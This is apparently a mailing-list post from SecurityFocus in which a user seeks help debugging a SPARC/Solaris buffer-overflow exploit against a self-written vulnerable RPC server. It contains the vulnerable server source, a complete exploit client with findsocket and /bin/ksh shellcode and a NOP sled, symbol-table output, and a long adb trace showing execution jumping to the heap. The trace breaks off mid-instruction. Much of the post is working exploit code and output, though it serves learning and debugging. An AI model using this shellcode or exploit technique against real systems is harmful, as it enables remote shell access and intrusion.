('binary' encoding is not supported, stored as-is) Mailer: SecurityFocus Thanks to all the kind people for the valuable responses. Here let me put my source code and some of the debugging process, to see whether you can find the problem. Some notes first: 1. For Golden_Eternity: To make sure the debugged process has a similar address map, I use adb to attach to the running process rather than launching the process from adb. 2. In the debugging session that follows, I got a SIGSEGV in adb. But I did get an interactive shell from the client side on other days. In that case, I was able to run "ls, pwd....", but the server closed the hijacked socket file descriptor when I tried to "more /etc/passwd". 3. For Dave Aitel: If I run the server freely without adb or truss, the server neither crashes with SIGSEGV nor spawns a shell. That is what I mean by it seeming to skip the hacking code. 4. For dotslashat_private, I will post the truss output in another thread; I am afraid this one is too long. ================================ RPC interface file msg.x const MAXLEN=512; typedef string svrmsg<MAXLEN>; typedef char len_val<MAXLEN>; typedef len_val fromName; typedef len_val toName; typedef len_val MSG; struct username_msg { fromName fromname; toName toname; MSG msg; } ; program MSGBOARD_PROG { version MSGBOARD_VERSION { svrmsg makemsg(username_msg)=1; } = 1; } = 200000089; ==================================== The vulnerable RPC server: #include "msg.h" #include <errno.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <rpc/rpc.h> #include <unistd.h> int dynMemSize=1536; extern int errno; void backup(char*, int); void inbackup(char*, int); svrmsg * makemsg_1(username_msg* un_msg, struct svc_req *req) { static svrmsg smsg; char *backmsg; int fromInt, toInt, msgInt; if(smsg!=NULL) free(smsg); fromInt=un_msg->fromname.len_val_len; toInt=un_msg->toname.len_val_len; msgInt=un_msg->msg.len_val_len; backmsg=malloc(dynMemSize); memset(backmsg,'\x00', dynMemSize); /*Client takes sometime to 
transmit the msg*/ sleep(5); /*Can't use strcpy cuz heap address contain \x00*/ memcpy(backmsg, un_msg- >fromname.len_val_val, fromInt); memcpy((char*)backmsg+fromInt, " said to ", 12); memcpy((char*)backmsg+fromInt+12, un_msg- >toname.len_val_val, toInt); memcpy((char*) backmsg+fromInt+toInt+12, "==> ", 4); memcpy((char*)backmsg+fromInt+toInt+16, un_msg->msg.len_val_val, msgInt); /*Here call the vulnerable func*/ backup(un_msg->fromname.len_val_val, fromInt); smsg=&backmsg[0]; return (&smsg); } void backup(char* bkFromName, int nmlen) { inbackup(bkFromName, nmlen); } void inbackup(char *bkFromName, int nmlen) { char tempDir[12]; memcpy(tempDir,bkFromName, nmlen); } ====================================== ======= The hacking client #include "msg.h" #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/time.h> #include <netinet/in.h> #include <rpc/rpc.h> #include <netdb.h> #include <unistd.h> char findsckcode[]= "\x20\xbf\xff\xff" /* bn,a <findsckcode-4> */ "\x20\xbf\xff\xff" /* bn,a <findsckcode> */ "\x7f\xff\xff\xff" /* call <findsckcode+4> */ "\x33\x02\x12\x34" "\xa0\x10\x20\xff" /* mov 0xff,%l0 */ "\xa2\x10\x20\x54" /* mov 0x54,%l1 */ "\xa4\x03\xff\xd0" /* add %o7,-48,%l2 */ "\xaa\x03\xe0\x28" /* add %o7,40,%l5 */ "\x81\xc5\x60\x08" /* jmp %l5+8 */ "\xc0\x2b\xe0\x04" /* stb %g0,[%o7+4] */ "\xe6\x03\xff\xd0" /* ld [%o7-48],%l3 */ "\xe8\x03\xe0\x04" /* ld [%o7+4],%l4 */ "\xa8\xa4\xc0\x14" /* subcc %l3,%l4,%l4 */ "\x02\xbf\xff\xfb" /* bz <findsckcode+32> */ "\xaa\x03\xe0\x5c" /* add %o7,92,%l5 */ "\xe2\x23\xff\xc4" /* st %l1,[%o7-60] */ "\xe2\x23\xff\xc8" /* st %l1,[%o7-56] */ "\xe4\x23\xff\xcc" /* st %l2,[%o7-52] */ "\x90\x04\x20\x01" /* add %l0,1,%o0 */ "\xa7\x2c\x60\x08" /* sll %l1,8,%l3 */ "\x92\x14\xe0\x91" /* or %l3,0x91,%o1 */ "\x94\x03\xff\xc4" /* add %o7,-60,%o2 */ "\x82\x10\x20\x36" /* mov 0x36,%g1 */ "\x91\xd0\x20\x08" /* ta 8 */ "\x1a\xbf\xff\xf1" /* bcc <findsckcode+36> */ 
"\xa0\xa4\x20\x01" /* deccc %l0 */ "\x12\xbf\xff\xf5" /* bne <findsckcode+60> */ "\xa6\x10\x20\x03" /* mov 0x03,%l3 */ "\x90\x04\x20\x02" /* add %l0,2,%o0 */ "\x92\x10\x20\x09" /* mov 0x09,%o1 */ "\x94\x04\xff\xff" /* add %l3,-1,%o2 */ "\x82\x10\x20\x3e" /* mov 0x3e,%g1 */ "\xa6\x84\xff\xff" /* addcc %l3,-1,%l3 */ "\x12\xbf\xff\xfb" /* bne <findsckcode+112> */ "\x91\xd0\x20\x08" /* ta 8 */ ; char shellcode[]= "\x20\xbf\xff\xff" /* bn,a <shellcode-4> */ "\x20\xbf\xff\xff" /* bn,a <shellcode> */ "\x7f\xff\xff\xff" /* call <shellcode+4> */ "\x90\x03\xe0\x20" /* add %o7,32,%o0 */ "\x92\x02\x20\x10" /* add %o0,16,%o1 */ "\xc0\x22\x20\x08" /* st %g0,[%o0+8] */ "\xd0\x22\x20\x10" /* st %o0,[%o0+16] */ "\xc0\x22\x20\x14" /* st %g0,[%o0+20] */ "\x82\x10\x20\x0b" /* mov 0x0b,%g1 */ "\x91\xd0\x20\x08" /* ta 8 */ "/bin/ksh" ; static char nop[]="\x80\x1c\x40\x11"; extern int errno; static struct timeval TIMEOUT = { 25, 0 }; /*The xdr_req will replace normal rpc client request-- (xdrproc_t) xdr_svrmsg*/ bool_t xdr_req(XDR *xdrs,username_msg *objp){ if(!xdr_array(xdrs,&objp- >fromname.len_val_val,&objp- >fromname.len_val_len,~0,sizeof(char), (xdrproc_t) xdr_char)) return(FALSE); if(!xdr_array(xdrs,&objp- >toname.len_val_val,&objp- >toname.len_val_len,~0,sizeof(char), (xdrproc_t) xdr_char)) return(FALSE); if(!xdr_array(xdrs,&objp->msg.len_val_val,&objp- >msg.len_val_len,~0,sizeof(char), (xdrproc_t) xdr_char)) return(FALSE); return(TRUE); } main(int argc, char *argv[]) { CLIENT *clnt; char address[4]; char *b0, *b1, *b2, *b3; char buffer[2048]; username_msg umsg; svrmsg *result; int sck, n, i, port=0; enum clnt_stat stat; struct hostent *hp; struct sockaddr_in adr; if (argc != 2) { fprintf(stderr, "usage: %s host \n",argv[0]); exit(1); } adr.sin_family=AF_INET; adr.sin_port=htons(port); if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if((hp=gethostbyname(argv[1]))==NULL){ errno=EADDRNOTAVAIL;perror("error");exit(- 1); } memcpy(&adr.sin_addr.s_addr,hp->h_addr,4); } /*create a RPC 
session based on tcp, */ */ sck=RPC_ANYSOCK; clnt = clnttcp_create(&adr, MSGBOARD_PROG, MSGBOARD_VERSION, &sck,0,0); if (clnt == (CLIENT *)NULL) { clnt_pcreateerror("error"); exit(1); } i=sizeof(struct sockaddr_in); if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1) { struct{unsigned int maxlen;unsigned int len;char *buf;}nb; ioctl(sck,(('S'<<8)|2),"sockmod"); nb.maxlen=0xffff; nb.len=sizeof(struct sockaddr_in);; nb.buf=(char*)&adr; ioctl(sck,(('T'<<8)|144),&nb); } n=ntohs(adr.sin_port); printf("port=%d connected! \n",n);fflush(stdout); sleep(3); findsckcode[12+2]=(unsigned char)((n&0xff00)>>8); findsckcode[12+3]=(unsigned char)(n&0xff); *(unsigned int*)address=0x6dc80; *(unsigned int*)address=htonl(*(unsigned int*) address); b0=&buffer[0]; b1=&buffer[0]; for(i=0;i<252;i++) *b1++=address[i%4]; for(i=0;i<4;i++) *b1++=0; b2=&buffer[256]; for(i=256;i<508;i++) *b2++=address[i%4]; for(i=0;i<4;i++) *b2++=0; b3=&buffer[512]; for(i=0;i<256;i++) *b3++=nop[i%4]; for(i=0;i<strlen(findsckcode);i++) *b3++=findsckcode[i]; for(i=0;i<strlen(shellcode);i++) *b3++=shellcode[i]; *b3=0; /*refer to xdr_array function and msg.x to see how xdr conversion goes*/ umsg.fromname.len_val_len=252; umsg.fromname.len_val_val=b0; umsg.toname.len_val_len=252; umsg.toname.len_val_val=b1; umsg.msg.len_val_len=456; umsg.msg.len_val_val=b2; stat = clnt_call(clnt, makemsg , (xdrproc_t) xdr_req, (caddr_t) &umsg, xdr_void , NULL, TIMEOUT); if (stat==RPC_SUCCESS) {printf("\nerror: not vulnerable\n");exit(-1);} printf("sent!\n"); write(sck,"/bin/uname -a\n",14); while(1){ fd_set fds; FD_ZERO(&fds); FD_SET(0,&fds); FD_SET(sck,&fds); if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){ int cnt; char buf[1024]; if(FD_ISSET(0,&fds)){ if((cnt=read(0,buf,1024))<1){ if (errno==EWOULDBLOCK||errno==EAGAIN) continue; else break; } write(sck,buf,cnt); } if(FD_ISSET(sck,&fds)){ if((cnt=read(sck,buf,1024))<1){ if (errno==EWOULDBLOCK||errno==EAGAIN) continue; else break; } write(1,buf,cnt); } } } } ============================ 
==> list the name list first testbox:/home/minchumo nm -x msg_svc msg_svc: [Index] Value Size Type Bind Other Shndx Name [26] |0x00000000|0x00000000|SECT |LOCL |0 |25 | [2] |0x000100d4|0x00000000|SECT |LOCL |0 |1 | [3] |0x000100e8|0x00000000|SECT |LOCL |0 |2 | [4] |0x000103c4|0x00000000|SECT |LOCL |0 |3 | [5] |0x000109e4|0x00000000|SECT |LOCL |0 |4 | [6] |0x00010d10|0x00000000|SECT |LOCL |0 |5 | [7] |0x00010d50|0x00000000|SECT |LOCL |0 |6 | [8] |0x00010d80|0x00000000|SECT |LOCL |0 |7 | [9] |0x00010d8c|0x00000000|SECT |LOCL |0 |8 | [10] |0x00010f40|0x00000000|SECT |LOCL |0 |9 | [11] |0x00011b20|0x00000000|SECT |LOCL |0 |10 | [12] |0x00011b70|0x00000000|SECT |LOCL |0 |11 | [13] |0x00011bc0|0x00000000|SECT |LOCL |0 |12 | [14] |0x00011bc4|0x00000000|SECT |LOCL |0 |13 | [15] |0x00011bc8|0x00000000|SECT |LOCL |0 |14 | [16] |0x00021c14|0x00000000|SECT |LOCL |0 |15 | [17] |0x00021c18|0x00000000|SECT |LOCL |0 |16 | [18] |0x00021dfc|0x00000000|SECT |LOCL |0 |17 | [19] |0x00021ebc|0x00000000|SECT |LOCL |0 |18 | [20] |0x00021ee8|0x00000000|SECT |LOCL |0 |19 | [21] |0x00021f1c|0x00000000|SECT |LOCL |0 |20 | [22] |0x00021ffc|0x00000000|SECT |LOCL |0 |21 | [23] |0x00000000|0x00000000|SECT |LOCL |0 |22 | [24] |0x00000000|0x00000000|SECT |LOCL |0 |23 | [25] |0x00000000|0x00000000|SECT |LOCL |0 |24 | [27] |0x00000000|0x00000000|SECT |LOCL |0 |26 | [28] |0x00000000|0x00000000|SECT |LOCL |0 |27 | [82] |0x00021dfc|0x00000000|OBJT |GLOB |0 |17 |_DYNAMIC [30] |0x00022010|0x00000000|OBJT |LOCL |0 |21 |_END_ [62] |0x00021c14|0x00000000|OBJT |GLOB |0 |15 |_GLOBAL_OFFSET_TABLE_ [105] |0x00021c18|0x00000000|OBJT |GLOB |0 |16 |_PROCEDURE_LINKAGE_TABLE_ [29] |0x00010000|0x00000000|OBJT |LOCL |0 |1 |_START_ [51] |0x00000000|0x00000000|NOTY |WEAK |0 |UNDEF |__1cH__CimplKcplus_fini6F_v_ [119] |0x00000000|0x00000000|NOTY |WEAK |0 |UNDEF |__1cH__CimplKcplus_init6F_v_ [78] |0x00021f0c|0x00000004|OBJT |GLOB |0 |19 |___Argv [93] |0x00021f08|0x00000004|OBJT |GLOB |0 |19 |__cg92_used [36] 
|0x00021f04|0x00000004|OBJT |LOCL |0 |19 |__crt_scratch [117] |0x00021ee8|0x00000018|OBJT |GLOB |0 |19 |__environ_lock [107] |0x00000000|0x00000000|NOTY |GLOB |0 |ABS |__fsr_init_value [104] |0x00021ff9|0x00000000|OBJT |GLOB |0 |20 |_edata [58] |0x00022010|0x00000000|OBJT |GLOB |0 |21 |_end [57] |0x00021f00|0x00000004|OBJT |GLOB |0 |19 |_environ [109] |0x00011c14|0x00000000|OBJT |GLOB |0 |14 |_etext [90] |0x00000000|0x00000000|NOTY |WEAK |0 |UNDEF |_ex_deregister [33] |0x00011bc0|0x00000000|NOTY |LOCL |0 |12 |_ex_range0 [49] |0x00011bc0|0x00000000|NOTY |LOCL |0 |12 |_ex_range1 [61] |0x00000000|0x00000000|NOTY |WEAK |0 |UNDEF |_ex_register [32] |0x00021ecc|0x00000000|NOTY |LOCL |0 |18 |_ex_shared0 [48] |0x00021edc|0x00000000|NOTY |LOCL |0 |18 |_ex_shared1 [34] |0x00010f40|0x00000000|NOTY |LOCL |0 |9 |_ex_text0 [50] |0x00011b20|0x00000000|NOTY |LOCL |0 |9 |_ex_text1 [88] |0x00021c60|0x00000000|FUNC |GLOB |0 |UNDEF |_exit [118] |0x00011b70|0x00000050|FUNC |GLOB |0 |11 |_fini [73] |0x00011b20|0x00000050|FUNC |GLOB |0 |10 |_init [110] |0x00011bc4|0x00000004|OBJT |GLOB |0 |13 |_lib_version [42] |0x000111f8|0x00000024|FUNC |LOCL |0 |9 |_msgout [45] |0x00022000|0x00000004|OBJT |LOCL |0 |21 |_rpcpmstart [41] |0x00021f18|0x00000004|OBJT |LOCL |0 |19 |_rpcsvccount [40] |0x00021f14|0x00000004|OBJT |LOCL |0 |19 |_rpcsvcstate [52] |0x00010f40|0x000000d0|FUNC |GLOB |0 |9 |_start [69] |0x00021cc0|0x00000000|FUNC |GLOB |0 |UNDEF |alarm [67] |0x00021c48|0x00000000|FUNC |GLOB |0 |UNDEF |atexit [60] |0x00011180|0x00000028|FUNC |GLOB |0 |9 |backup [97] |0x00021d98|0x00000000|FUNC |GLOB |0 |UNDEF |close [43] |0x00011230|0x00000118|FUNC |LOCL |0 |9 |closedown [35] |0x00000000|0x00000000|FILE |LOCL |0 |ABS |crt1.s [31] |0x00000000|0x00000000|FILE |LOCL |0 |ABS |crti.s [47] |0x00000000|0x00000000|FILE |LOCL |0 |ABS |crtn.s [80] |0x00021db0|0x00000000|FUNC |GLOB |0 |UNDEF |dup2 [112] |0x00021f10|0x00000004|OBJT |GLOB |0 |19 |dynMemSize [91] |0x00021f00|0x00000004|OBJT |WEAK |0 |19 |environ 
[68] |0x00021c54|0x00000000|FUNC |GLOB |0 |UNDEF |exit [59] |0x00021d74|0x00000000|FUNC |GLOB |0 |UNDEF |fork [96] |0x00021c6c|0x00000000|FUNC |GLOB |0 |UNDEF |free [76] |0x00021d50|0x00000000|FUNC |GLOB |0 |UNDEF |freenetconfigent [79] |0x00021d2c|0x00000000|FUNC |GLOB |0 |UNDEF |getenv [71] |0x00021d38|0x00000000|FUNC |GLOB |0 |UNDEF |getnetconfigent [100] |0x00021d8c|0x00000000|FUNC |GLOB |0 |UNDEF |getrlimit [103] |0x000111b8|0x0000002c|FUNC |GLOB |0 |9 |inbackup [113] |0x00011570|0x00000334|FUNC |GLOB |0 |9 |main [56] |0x00011020|0x0000014c|FUNC |GLOB |0 |9 |makemsg_1 [72] |0x00021c78|0x00000000|FUNC |GLOB |0 |UNDEF |malloc [116] |0x00021c9c|0x00000000|FUNC |GLOB |0 |UNDEF |memcpy [106] |0x00021c84|0x00000000|FUNC |GLOB |0 |UNDEF |memset [38] |0x00000000|0x00000000|FILE |LOCL |0 |ABS |msg_proc.c [1] |0x00000000|0x00000000|FILE |LOCL |0 |ABS |msg_svc [39] |0x00000000|0x00000000|FILE |LOCL |0 |ABS |msg_svc.c [46] |0x00000000|0x00000000|FILE |LOCL |0 |ABS |msg_xdr.c [44] |0x00011358|0x00000204|FUNC |LOCL |0 |9 |msgboard_prog_1 [99] |0x00021da4|0x00000000|FUNC |GLOB |0 |UNDEF |open [70] |0x00021d20|0x00000000|FUNC |GLOB |0 |UNDEF |openlog [92] |0x00021d80|0x00000000|FUNC |GLOB |0 |UNDEF |perror [87] |0x00021dbc|0x00000000|FUNC |GLOB |0 |UNDEF |setsid [65] |0x00021cb4|0x00000000|FUNC |GLOB |0 |UNDEF |signal [86] |0x00021d08|0x00000000|FUNC |GLOB |0 |UNDEF |sigset [64] |0x00021c90|0x00000000|FUNC |GLOB |0 |UNDEF |sleep [81] |0x00021dc8|0x00000000|FUNC |GLOB |0 |UNDEF |svc_create [84] |0x00022008|0x00000004|OBJT |GLOB |0 |21 |svc_max_pollfd [120] |0x0002200c|0x00000004|OBJT |GLOB |0 |21 |svc_pollfd [83] |0x00021d5c|0x00000000|FUNC |GLOB |0 |UNDEF |svc_reg [101] |0x00021d68|0x00000000|FUNC |GLOB |0 |UNDEF |svc_run [75] |0x00021cd8|0x00000000|FUNC |GLOB |0 |UNDEF |svc_sendreply [89] |0x00021d44|0x00000000|FUNC |GLOB |0 |UNDEF |svc_tli_create [74] |0x00021cf0|0x00000000|FUNC |GLOB |0 |UNDEF |svcerr_decode [85] |0x00021ce4|0x00000000|FUNC |GLOB |0 |UNDEF |svcerr_noproc 
[66] |0x00021cfc|0x00000000|FUNC |GLOB |0 |UNDEF |svcerr_systemerr [114] |0x00021ca8|0x00000000|FUNC |GLOB |0 |UNDEF |syslog [55] |0x00022004|0x00000004|OBJT |GLOB |0 |21 |t_errno [54] |0x00021d14|0x00000000|FUNC |GLOB |0 |UNDEF |t_getstate [37] |0x00000000|0x00000000|FILE |LOCL |0 |ABS |values-Xa.c [102] |0x00011a30|0x00000044|FUNC |GLOB |0 |9 |xdr_MSG [94] |0x00021dec|0x00000000|FUNC |GLOB |0 |UNDEF |xdr_array [98] |0x00021de0|0x00000000|FUNC |GLOB |0 |UNDEF |xdr_char [111] |0x00011980|0x00000044|FUNC |GLOB |0 |9 |xdr_fromName [63] |0x00011910|0x0000005c|FUNC |GLOB |0 |9 |xdr_len_val [115] |0x00021dd4|0x00000000|FUNC |GLOB |0 |UNDEF |xdr_string [77] |0x000118b8|0x00000048|FUNC |GLOB |0 |9 |xdr_svrmsg [95] |0x000119d8|0x00000044|FUNC |GLOB |0 |9 |xdr_toName [108] |0x00011a88|0x00000094|FUNC |GLOB |0 |9 |xdr_username_msg [53] |0x00021ccc|0x00000000|FUNC |GLOB |0 |UNDEF |xdr_void testbox:/home/minchumo ============================ Experiment Log ==>Normal usage of the RPC Service testbox:/home/minchumo rmsg testbox dog cat hi dog said to cat==> hi testbox:/home/minchumo ===>Exploitation: 0. Run server msg_svc 1. First several normal executions of RPC server as above. 2. Run hacking code 3. Interact as following ==>Client side testbox:/home/minchumo rmsge testbox port=59985 connected! sent! ===>Server side testbox:/home/minchumo r ps ps -ef | grep msg minchumo 6928 6142 0 10:26:30 pts/4 0:00 grep msg minchumo 6924 1 0 10:25:46 ? 
0:00 msg_svc testbox:/home/minchumo adb 0t6924:A process 6924 stopped at: _poll+4: ta 0x8 /*stop at entry point makemsg_1*/ makemsg_1:b :c breakpoint at: makemsg_1: save %sp, -0x78, %sp :s stopped at: makemsg_1+4: st %i1, [%fp + 0x48] :s stopped at: makemsg_1+8: st %i0, [%fp + 0x44] :S stopped at: makemsg_1+0xc: sethi %hi(0x21c00), %l0 :s stopped at: makemsg_1+0x10: ld [%l0 + 0x3fc], %l0 :s stopped at: makemsg_1+0x14: cmp %l0, %g0 :s stopped at: makemsg_1+0x18: be makemsg_1+0x2c :s stopped at: makemsg_1+0x1c: nop :s stopped at: makemsg_1+0x20: sethi %hi(0x21c00), %l0 :s stopped at: /*This is call to function free, since we have normal client request before The dynamic memory was allocated and need to be freed*/ makemsg_1+0x24: call 0x21c6c :s stopped at: makemsg_1+0x28: ld [%l0 + 0x3fc], %o0 :s stopped at: 21c6c: sethi %hi(0x15000), %g1 :s stopped at: 21c70: sethi %hi(0xff1c6400), %g1 $r g0 0 l0 21c00 g1 15000 xdr_username_msg+0x3578 l1 0 g2 0 l2 0 g3 0 l3 0 g4 0 l4 0 g5 0 l5 0 g6 0 l6 0 g7 0 l7 0 o0 6da58 i0 ffbeee48 o1 0 i1 24808 _rpcpmstart+0x2808 o2 0 i2 ffbeee48 o3 0 i3 66f00 o4 0 i4 ff311c8c o5 0 i5 ffbeee61 sp ffbeed60 fp ffbeedd8 o7 11044 makemsg_1+0x24 i7 114ac msgboard_prog_1+0x154 y 0 tstate: 82001a07 (ccr=0x0, asi=0x82, pstate=0x1a, cwp=0x7) pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0 mg:0 ig:0 pc 21c70 21c70: sethi %hi(0xff1c6400), % g1 npc 21c74 21c74: jmp %g1 + 0x14c /*The address 6da58 point to server response for last client request This dynamic memory will be free*/ 6da58/4X 6da58: 646f6720 20736169 64202074 6f202063 6da58/S 6da58: dog said to cat==> hi memset:b :c breakpoint at: memset: mov %o0, %o5 $r g0 0 l0 21f10 dynMemSize g1 1e000 l1 ffbeee48 g2 0 l2 0 g3 0 l3 0 g4 0 l4 0 g5 0 l5 0 g6 0 l6 0 g7 0 l7 0 o0 6da58 i0 ffbeee48 o1 0 i1 24808 _rpcpmstart+0x2808 o2 600 i2 ffbeee48 o3 0 i3 66f00 o4 ff235ad4 i4 ff311c8c o5 11044 makemsg_1+0x24 i5 ffbeee61 sp ffbeed60 fp ffbeedd8 o7 11080 makemsg_1+0x60 i7 114ac msgboard_prog_1+0x154 y 0 
tstate: 82001a04 (ccr=0x0, asi=0x82, pstate=0x1a, cwp=0x4) pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0 mg:0 ig:0 pc ff33190c memset: mov %o0, %o5 npc ff331910 _memset+4: cmp %o2, 0x10 memcpy:b :c /* Here we hit the alarm from sleep() after 5 seconds and the server wakes up. We now know that adb will receive the signal-handling system call*/ SIGALRM: Alarm Clock stopped at: _sigsuspend+4: ta 0x8 :c /*The following are the five memcpy calls that move the client request into the dynamically allocated memory*/ breakpoint at: memcpy: mov %o0, %o5 :c breakpoint at: memcpy: mov %o0, %o5 :c breakpoint at: memcpy: mov %o0, %o5 :c breakpoint at: memcpy: mov %o0, %o5 backup:b :c breakpoint at: memcpy: mov %o0, %o5 :c breakpoint at: backup: save %sp, -0x60, %sp :s stopped at: backup+4: st %i1, [%fp + 0x48] $r g0 0 l0 0 g1 676a8 l1 0 g2 0 l2 0 g3 0 l3 0 g4 0 l4 0 g5 0 l5 0 g6 0 l6 0 g7 0 l7 0 o0 0 i0 67470 o1 0 i1 fc o2 0 i2 0 o3 0 i3 0 o4 0 i4 0 o5 0 i5 6dc60 sp ffbeed00 fp ffbeed60 o7 0 i7 11138 makemsg_1+0x118 y 0 tstate: 4482001a06 (ccr=0x44, asi=0x82, pstate=0x1a, cwp=0x6) pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0 mg:0 ig:0 pc 11184 backup+4: st %i1, [%fp + 0x48] npc 11188 backup+8: st %i0, [%fp + 0x44] /*After the 5 memcpy calls, we can inspect the dyn. 
memory to see whether request was copied intact, and they seem to be good as following*/ 6da58/40X 6da58: 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6daf8: 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 20207361 69642020 746f2020 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6db98: 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc38: 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 6dc80 3d3d3e20 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 6dcd8: 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 801c4011 20bfffff 20bfffff 7fffffff 3302ea51 a01020ff a2102054 6dd78: a403ffd0 aa03e028 81c56008 c02be004 e603ffd0 e803e004 a8a4c014 2bffffb aa03e05c e223ffc4 e223ffc8 e423ffcc 90042001 a72c6008 9214e091 9403ffc4 82102036 91d02008 1abffff1 a0a42001 12bffff5 a6102003 90042002 92102009 9404ffff 8210203e a684ffff 12bffffb 91d02008 20bfffff 20bfffff 7fffffff 9003e020 92022010 c0222008 d0222010 c0222014 8210200b 91d02008 2f62696e 6de18: 2f6b7368 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 
0 0 0 0 0 0 0 0 backup+4/i /*Now call into vulerable function to overflow and jump to heap*/ backup+4: st %i1, [%fp + 0x48] :S stopped at: backup+8: st %i0, [%fp + 0x44] :s stopped at: backup+0xc: or %i0, %g0, %o0 :s stopped at: backup+0x10: call inbackup :s stopped at: backup+0x14: or %i1, %g0, %o1 :s stopped at: inbackup: save %sp, -0x70, %sp :s stopped at: inbackup+4: st %i1, [%fp + 0x48] :S stopped at: inbackup+8: st %i0, [%fp + 0x44] :s stopped at: inbackup+0xc: add %fp, -0xc, %o0 :s stopped at: inbackup+0x10: or %i0, %g0, %o1 :s stopped at: inbackup+0x14: call 0x21c9c :s stopped at: inbackup+0x18: or %i1, %g0, %o2 :s stopped at: 21c9c: sethi %hi(0x21000), %g1 inbackup+0x1c:b :c breakpoint at: memcpy: mov %o0, %o5 :s stopped at: forcpy+4: cmp %o2, 0x20 :s stopped at: forcpy+8: ??? :c breakpoint at: inbackup+0x1c: ret :s stopped at: inbackup+0x20: restore :s stopped at: backup+0x18: ret :s stopped at: backup+0x1c: restore :s stopped at: /*Now process controll was transmitted to heap*/ 6dc88: xor %l1, %l1, %g0 $r g0 0 l0 801c4011 g1 67568 l1 801c4011 g2 0 l2 801c4011 g3 0 l3 801c4011 g4 0 l4 801c4011 g5 0 l5 801c4011 g6 0 l6 801c4011 g7 0 l7 801c4011 o0 6dc80 i0 801c4011 o1 6dc80 i1 801c4011 o2 6dc80 i2 801c4011 o3 6dc80 i3 801c4011 o4 6dc80 i4 801c4011 o5 6dc80 i5 801c4011 sp 6dc80 fp 801c4011 o7 6dc80 i7 801c4011 y 0 tstate: 4482001a01 (ccr=0x44, asi=0x82, pstate=0x1a, cwp=0x1) pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0 mg:0 ig:0 pc 6dc88 6dc88: xor %l1, %l1, %g0 npc 6dc8c 6dc8c: xor %l1, %l1, %g0 .,40/i 6dc8c: xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, 
%g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 bn,a 0x6dd5c bn,a 0x6dd60 call 0x6dd64 sethi %hi(0xba94400), %i1 mov 0xff, %l0 mov 0x54, %l1 add %o7, -0x30, %l2 add %o7, 0x28, %l5 jmp %l5 + 0x8 stb %g0, [%o7 + 0x4] ld [%o7 - 0x30], %l3 .,20/i 6dd88: ld [%o7 - 0x30], %l3 ld [%o7 + 0x4], %l4 subcc %l3, %l4, %l4 be 0x6dd80 add %o7, 0x5c, %l5 st %l1, [%o7 - 0x3c] st %l1, [%o7 - 0x38] st %l2, [%o7 - 0x34] add %l0, 0x1, %o0 sll %l1, 0x8, %l3 or %l3, 0x91, %o1 add %o7, -0x3c, %o2 mov 0x36, 